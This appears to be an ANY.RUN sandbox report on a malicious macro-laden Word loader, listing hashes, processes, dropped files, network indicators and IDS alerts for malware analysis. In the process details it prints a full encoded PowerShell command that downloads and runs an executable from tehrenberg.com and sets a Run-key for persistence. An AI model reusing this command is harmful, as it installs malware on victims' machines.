analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

98ded9f98932d9b9b761e397514ab3f7fe43ceae7d322999b99cf4efb1380226.doc

Full analysis: https://app.any.run/tasks/ac09f8ca-4aff-4bf1-af7b-786a3ca630ed
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: June 12, 2019, 03:29:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Bash Jing, Template: Normal.dotm, Last Saved By: MARTIN C, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 04:00, Create Time/Date: Thu Jun 6 17:10:00 2019, Last Saved Time/Date: Tue Jun 11 14:51:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 166, Security: 0
MD5:

44E333AA32364314D0717DAFEE05F154

SHA1:

9C7496DA03A81A8DB79242015BBF9723DCE5A0BA

SHA256:

98DED9F98932D9B9B761E397514AB3F7FE43CEAE7D322999B99CF4EFB1380226

SSDEEP:

768:hckkkkkkkkq5t38k6QFAO+NGN5LZ/NaOmDvRrmmCajj96eehJati4aCS:hNIbQZ5LZ/Na7DZsuMmkh

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • sample.exe (PID: 3380)
      • msword.exe (PID: 3344)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1524)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3332)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1524)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2176)
    • Changes the autorun value in the registry

      • powershell.exe (PID: 3332)
  • SUSPICIOUS

    • Creates files in the user directory

      • cmd.exe (PID: 3512)
      • powershell.exe (PID: 3332)
      • cmd.exe (PID: 3220)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3332)
      • cmd.exe (PID: 3512)
    • Starts CMD.EXE for commands execution

      • sample.exe (PID: 3380)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1524)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: 39
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: 194
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 166
Words: 29
Pages: 1
ModifyDate: 2019:06:11 13:51:00
CreateDate: 2019:06:06 16:10:00
TotalEditTime: 4.0 minutes
Software: Microsoft Office Word
RevisionNumber: 3
LastModifiedBy: MARTIN C
Template: Normal.dotm
Comments: -
Keywords: -
Author: Bash Jing
Subject: -
Title: -
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
9
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe sample.exe cmd.exe no specs cmd.exe no specs cmd.exe cmd.exe no specs msword.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1524"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\98ded9f98932d9b9b761e397514ab3f7fe43ceae7d322999b99cf4efb1380226.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2176"C:\Windows\System32\cmd.exe" /C POWErsheLL -E ZgB1AG4AYwB0AGkAbwBuACAATABvAGgAXwBwAHIAcgBJAGsAaABwAFQAXwAzAHYAXwAzAHQATQBxAGIAXwBQAGUAIAAoACAAJAByAFYAWgBQAFYAdQBtAGUAOABfAHUAUAB4ADUAXwBfAHUAYQBJAGcAWQBvADgAUgBwAEsAQgBfACAALAAgACQAdQBUAEUATgBfADgAOABLAEgAMgBEAHYAXwB4AF8AcwBBACAAKQANAAoAewANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoAA0ACgAkAHIAVgBaAFAAVgB1AG0AZQA4AF8AdQBQAHgANQBfAF8AdQBhAEkAZwBZAG8AOABSAHAASwBCAF8AIAAsACAAJAB1AFQARQBOAF8AOAA4AEsASAAyAEQAdgBfAHgAXwBzAEEAIAApADsADQAKACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAHUAVABFAE4AXwA4ADgASwBIADIARAB2AF8AeABfAHMAQQAgACkADQAKADsAfQANAAoAdAByAHkAewANAAoADQAKACQAcgBXAHoASABsADIAUwA9ACQAZQBuAHYAOgBhAHAAUABEAEEAVABhACsAJwBcAHMAYQBtAHAAbABlAC4AZQB4AGUAJwA7AA0ACgBMAG8AaABfAHAAcgByAEkAawBoAHAAVABfADMAdgBfADMAdABNAHEAYgBfAFAAZQAgACcAaAB0AHQAcAA6AC8ALwB0AGUAaAByAGUAbgBiAGUAcgBnAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQALgBwAGgAcAA/AGYAaQBsAGUAPQBNAHoAYwB5AE0AagBZADMATwBUAEEAeQBPAEYAOQBmAFgAMQA5AGoAYgBXAEYAeQBkAEcAbAB1AGMAeQA1AGwAZQBHAFUAPQAnACAAJAByAFcAegBIAGwAMgBTADsADQAKACQARwBTAHcAdgBBAHQAcgBkADQARgBfAHoAdQBZAHAAcwBfACAAPQAkAGUAbgB2ADoAYQBwAFAARABBAFQAYQArACcAXABzAGEAbQBwAGwAZQAuAGUAeABlACcAOwBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAGEAbQBlACAAJwBtAGkAYwByAG8AcwBvAGYAdAAnACAALQBWAGEAbAB1AGUAIAAkAEcAUwB3AHYAQQB0AHIAZAA0AEYAXwB6AHUAWQBwAHMAXwAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwANAAoADQAKAA0ACgB9AA0ACgBjAGEAdABjAGgAewB9AA==C:\Windows\System32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3332POWErsheLL -E ZgB1AG4AYwB0AGkAbwBuACAATABvAGgAXwBwAHIAcgBJAGsAaABwAFQAXwAzAHYAXwAzAHQATQBxAGIAXwBQAGUAIAAoACAAJAByAFYAWgBQAFYAdQBtAGUAOABfAHUAUAB4ADUAXwBfAHUAYQBJAGcAWQBvADgAUgBwAEsAQgBfACAALAAgACQAdQBUAEUATgBfADgAOABLAEgAMgBEAHYAXwB4AF8AcwBBACAAKQANAAoAewANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoAA0ACgAkAHIAVgBaAFAAVgB1AG0AZQA4AF8AdQBQAHgANQBfAF8AdQBhAEkAZwBZAG8AOABSAHAASwBCAF8AIAAsACAAJAB1AFQARQBOAF8AOAA4AEsASAAyAEQAdgBfAHgAXwBzAEEAIAApADsADQAKACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AYwBvAG0AIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AKQAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAIAAkAHUAVABFAE4AXwA4ADgASwBIADIARAB2AF8AeABfAHMAQQAgACkADQAKADsAfQANAAoAdAByAHkAewANAAoADQAKACQAcgBXAHoASABsADIAUwA9ACQAZQBuAHYAOgBhAHAAUABEAEEAVABhACsAJwBcAHMAYQBtAHAAbABlAC4AZQB4AGUAJwA7AA0ACgBMAG8AaABfAHAAcgByAEkAawBoAHAAVABfADMAdgBfADMAdABNAHEAYgBfAFAAZQAgACcAaAB0AHQAcAA6AC8ALwB0AGUAaAByAGUAbgBiAGUAcgBnAC4AYwBvAG0ALwBkAG8AdwBuAGwAbwBhAGQALgBwAGgAcAA/AGYAaQBsAGUAPQBNAHoAYwB5AE0AagBZADMATwBUAEEAeQBPAEYAOQBmAFgAMQA5AGoAYgBXAEYAeQBkAEcAbAB1AGMAeQA1AGwAZQBHAFUAPQAnACAAJAByAFcAegBIAGwAMgBTADsADQAKACQARwBTAHcAdgBBAHQAcgBkADQARgBfAHoAdQBZAHAAcwBfACAAPQAkAGUAbgB2ADoAYQBwAFAARABBAFQAYQArACcAXABzAGEAbQBwAGwAZQAuAGUAeABlACcAOwBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAJwBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAGEAbQBlACAAJwBtAGkAYwByAG8AcwBvAGYAdAAnACAALQBWAGEAbAB1AGUAIAAkAEcAUwB3AHYAQQB0AHIAZAA0AEYAXwB6AHUAWQBwAHMAXwAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAIAAtAEYAbwByAGMAZQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwANAAoADQAKAA0ACgB9AA0ACgBjAGEAdABjAGgAewB9AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3380"C:\Users\admin\AppData\Roaming\sample.exe" C:\Users\admin\AppData\Roaming\sample.exe
powershell.exe
User:
admin
Company:
usujivezugeqofiyedobeqap
Integrity Level:
MEDIUM
Description:
ikikucic
Exit code:
0
Version:
2.3.5.6
3220"C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\admin\AppData\Roaming\sample.exe:Zone.Identifier"C:\Windows\System32\cmd.exesample.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3792"C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\admin\AppData\Roaming\sample.exe:Zone.Identifier"C:\Windows\System32\cmd.exesample.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3512"C:\Windows\System32\cmd.exe" /c copy "C:\Users\admin\AppData\Roaming\sample.exe" "C:\Users\admin\AppData\Roaming\msword.exe"C:\Windows\System32\cmd.exe
sample.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3560"C:\Windows\System32\cmd.exe" /c, "C:\Users\admin\AppData\Roaming\msword.exe"C:\Windows\System32\cmd.exesample.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3344"C:\Users\admin\AppData\Roaming\msword.exe"C:\Users\admin\AppData\Roaming\msword.execmd.exe
User:
admin
Company:
usujivezugeqofiyedobeqap
Integrity Level:
MEDIUM
Description:
ikikucic
Version:
2.3.5.6
Total events
1 150
Read events
1 050
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
1524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR18E.tmp.cvr
MD5:
SHA256:
3332powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HN5WI1RFOY62NZ3NO2MF.temp
MD5:
SHA256:
3332powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
1524WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ded9f98932d9b9b761e397514ab3f7fe43ceae7d322999b99cf4efb1380226.docpgc
MD5:5C9DC36C32060898C5676A96D667E710
SHA256:C7ACF172F61FA0F142CABED95324EC2F371C6BBB38B4A893F1176F49BAA8BF99
1524WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:41AD77EE06EF5B3E818A89CD9A0B956B
SHA256:F9CD2063275FEB8D09F31FF8ECE373F84F5767290826836ACFA52E3683B82ECC
3332powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF120a0a.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
3512cmd.exeC:\Users\admin\AppData\Roaming\msword.exeexecutable
MD5:C152E07C298D1A007CE410A488D0563A
SHA256:7255AD5BCB24214DAB33D7DBBBFF317A0FC3CB3ECAFFD59E313C72BDBF5B0AFC
3332powershell.exeC:\Users\admin\AppData\Roaming\sample.exeexecutable
MD5:C152E07C298D1A007CE410A488D0563A
SHA256:7255AD5BCB24214DAB33D7DBBBFF317A0FC3CB3ECAFFD59E313C72BDBF5B0AFC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3332
powershell.exe
GET
200
174.141.231.74:80
http://tehrenberg.com/download.php?file=MzcyMjY3OTAyOF9fX19jbWFydGlucy5leGU=
US
executable
584 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3332
powershell.exe
174.141.231.74:80
tehrenberg.com
iWeb Technologies Inc.
US
malicious

DNS requests

Domain
IP
Reputation
tehrenberg.com
  • 174.141.231.74
malicious

Threats

PID
Process
Class
Message
3332
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3332
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3332
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1 ETPRO signatures available at the full report
Process
Message
sample.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1391
sample.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\identityauthority.cpp, line 278
sample.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\identityauthority.cpp, line 278
sample.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\identityauthority.cpp, line 278
sample.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1391
sample.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\identityauthority.cpp, line 278
sample.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1391
sample.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\identityauthority.cpp, line 278